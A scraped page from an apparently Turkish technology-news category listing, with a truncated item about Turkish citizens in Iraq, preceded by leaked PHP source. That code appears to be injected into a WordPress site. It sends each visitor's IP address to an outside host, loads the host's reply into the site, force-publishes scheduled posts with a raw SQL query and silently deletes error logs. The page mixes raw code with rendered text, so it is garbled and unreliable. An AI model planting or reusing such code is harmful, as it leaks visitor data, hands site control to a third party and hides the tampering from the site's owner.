$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> bulunuyor | Teknoloji Haberleri

bulunuyor kategorisindeki tüm yazılar

Son Yazılar

Irak’ta 4 bin kadar Türk vatandaşı bulunuyor

Diplomatik kaynaklar, Irak’ın 15 değişik vilayetinde şu anda 3-4 bin dolaylarında Türk yurttaşı bulunduğunun düşünüldüğünü bildirdi. Irak’taki gelişmeler hasebiyle Kuveyt’e gönderilen Basra Başkonsolosluğu personelinin bir bölümünün Türkiye’ye döndüğü, bir bölümünün da bu gece ülkeye geleceği öğrenildi. Dışişleri kaynakları, bir gün önce bölgedeki güvenlik meselesi hasebiyle Kuveyt’e gönderilen